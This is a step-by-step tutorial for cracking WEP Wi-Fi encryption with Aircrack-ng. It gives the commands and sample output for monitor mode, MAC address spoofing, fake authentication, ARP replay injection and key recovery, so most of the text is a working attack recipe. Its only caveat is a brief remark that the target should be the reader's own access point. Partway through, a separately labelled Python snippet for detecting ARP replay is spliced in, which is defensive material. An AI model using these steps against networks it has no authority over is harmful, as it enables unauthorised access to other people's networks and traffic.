Cracking WEP
Cracking WEP is one of those things I really enjoy doing. It's not hard; in fact the average user could probably do it using this or another paper.
First, let's list all the tools we will need:
- Wireless card with packet injection support (this tutorial is for the Atheros chipset ONLY)
- Laptop or desktop computer with the above wireless device installed
- Linux live CD or USB-bootable device with Linux on it
- Pen and paper are recommended
- Time: at least 25 minutes
First, boot into your Linux distro. For this tutorial we will stick with something simple like BackTrack 3 or 4.
Once booted up, make sure your wireless drivers are working and your card is able to connect to the internet.
Now that everything is verified and working, open up a Konsole
and log in as root using the command
su root
It should prompt you for a password; enter it and continue.
Now we need to see if the Aircrack-ng suite is installed or not.
Simply type airodump-ng
If you get something like "not found" then you need to install it using apt-get install aircrack-ng
After that finishes you should be ready to start the sniffing process.
If it says something about the interface not being specified then you're good.
Run airodump-ng -w /tmp/somefile <interface>
This should run airodump,
which lets you see the APs, their ESSIDs and their BSSIDs as well as other info needed.
If you have that pen and paper ready, jot down the ESSID and BSSID of your target (should be YOUR AP). Also note the channel number the AP is on; this is very important.
Once you have your target picked, hit Control + C to end the program and rerun with more params
airodump-ng -c <channel> --bssid <BSSID aka MAC address> -w <file to write packet capture to> <interface>
Now you should only have your target showing.
Onto the next steps :D
So Control + C to end airodump-ng.
Now we need to put our card in monitor mode.
What this does is put it into a mode where it listens to ALL packets going through the air, as opposed to only packets directed towards it.
airmon-ng stop <interface>
You should get something like
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)
Now that it's down you can optionally change the MAC address of your card,
for spoofing reasons
macchanger -m 00:00:13:37:00:00 <interface>
Now bring it back up
airmon-ng start <interface>
Doing this will create another interface, a virtual AP if you will.
So now we do
airodump-ng -c <channel> --bssid <BSSID aka MAC address> -w <file to write packet capture to> <New Interface>
Next we need to open another Konsole and again log in as root using su root :D
Now we're going to start our packet injection :D
But first we need to make sure we can inject.
Do this by running
aireplay-ng -9 -a <BSSID> <new interface>
-9 does a simple injection test; it should yield the following results or similar
09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP
09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%
The last line is the most important; it should be a number above 80%.
If it's 0 then injection is not working.
If it's lower than 80% you are too far away from the AP.
If everything is working so far for you and you have a high number, then next it's time to start our attack.
Our attack consists of 3 steps:
- Authenticate with our AP
- Listen for ARP packets and reinject them
- Sit back and let our packets increase
The reason we need to authenticate with the AP is because the access point will ignore everything we send it if we aren't authenticated.
We reinject ARPs because their IVs are unique. Our goal is to get the most unique IVs possible so we can break the encryption. Think of them as random pieces of the password; 2 equal pieces won't help.
First we send FAKE auth packets to the target AP
aireplay-ng -1 0 -a <BSSID> -h <your mac> <new interface>
-1 means fake authentication
0 means infinite
Running this should net you something similar to this
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Next up is the actual packet injection :D
Again open another Konsole and log in as root
aireplay-ng -3 -b <BSSID> -h <Your MAC> <new Interface>
-3 means ARP inject
Your results should be similar to below
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...
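The ARP reinjection above works by resending the same captured ARP request thousands of times, and that repetition is exactly what a wireless IDS on the defending side looks for. The following is an added example, not part of this paper or of Aircrack-ng: a small Python detector run over constructed frame summaries (the MAC addresses, IVs and timings are made up) that flags a station repeating an identical (IV, length) frame far more often than normal traffic ever would.

```python
from collections import defaultdict


def constructed_frames():
    """Constructed sample, not a real capture: a normal client that uses a
    fresh IV on every frame, followed by an injector replaying one encrypted
    ARP request (same IV, same 68-byte length) hundreds of times a second."""
    frames = []
    for i in range(20):  # normal client: unique IV per frame, 1 frame/sec
        frames.append((float(i), "00:aa:bb:cc:dd:01", "00:14:6c:7e:40:80",
                       0x100000 + i, 120))
    for i in range(300):  # replayed ARP request: identical IV and length
        frames.append((5.0 + i * 0.002, "00:00:13:37:00:00",
                       "00:14:6c:7e:40:80", 0x1a2b3c, 68))
    return frames


def find_replay_sources(frames, window=1.0, threshold=10):
    """Flag stations that sent an identical (IV, length) frame more than
    `threshold` times inside any `window`-second span.
    frames: iterable of (timestamp, src_mac, dst_mac, iv, length).
    Returns {src_mac: peak_repeats}; empty when nothing is suspicious."""
    stamps_by_key = defaultdict(list)
    for ts, src, _dst, iv, length in frames:
        stamps_by_key[(src, iv, length)].append(ts)
    flagged = {}
    for (src, _iv, _length), stamps in stamps_by_key.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):  # sliding window over timestamps
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            flagged[src] = max(peak, flagged.get(src, 0))
    return flagged


if __name__ == "__main__":
    for mac, count in find_replay_sources(constructed_frames()).items():
        print(f"possible ARP replay from {mac}: {count} identical frames/sec")
```

A real deployment would feed this from a monitor-mode capture and pair it with an alert on the fake-authentication burst that precedes the replay.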
Next open another console, log in again,
and restart our 2nd command
airodump-ng -c <channel> --bssid <BSSID aka MAC address> -w <file to write packet capture to> <New Interface>
After this you should note the DATA number should be increasing fairly quickly.
And that's it really; let it run for about 10-16 minutes. The more DATA you have the faster you can crack the WEP key:
20,000 packets for 64-bit
40,000 to 85,000 packets for 128-bit
After you reach that point go ahead and Control + C on all Konsole windows.
Then type aircrack-ng <file you used to save packets in>
This will bring up the aircrack-ng program. Select the AP (there should only be one) and let it crack.
You should get something like this
Aircrack-ng 0.9
[00:03:06] Tested 674449 keys (got 96610 IVs)
KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)
KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%
And that's Cracking WEP, by Mouseroot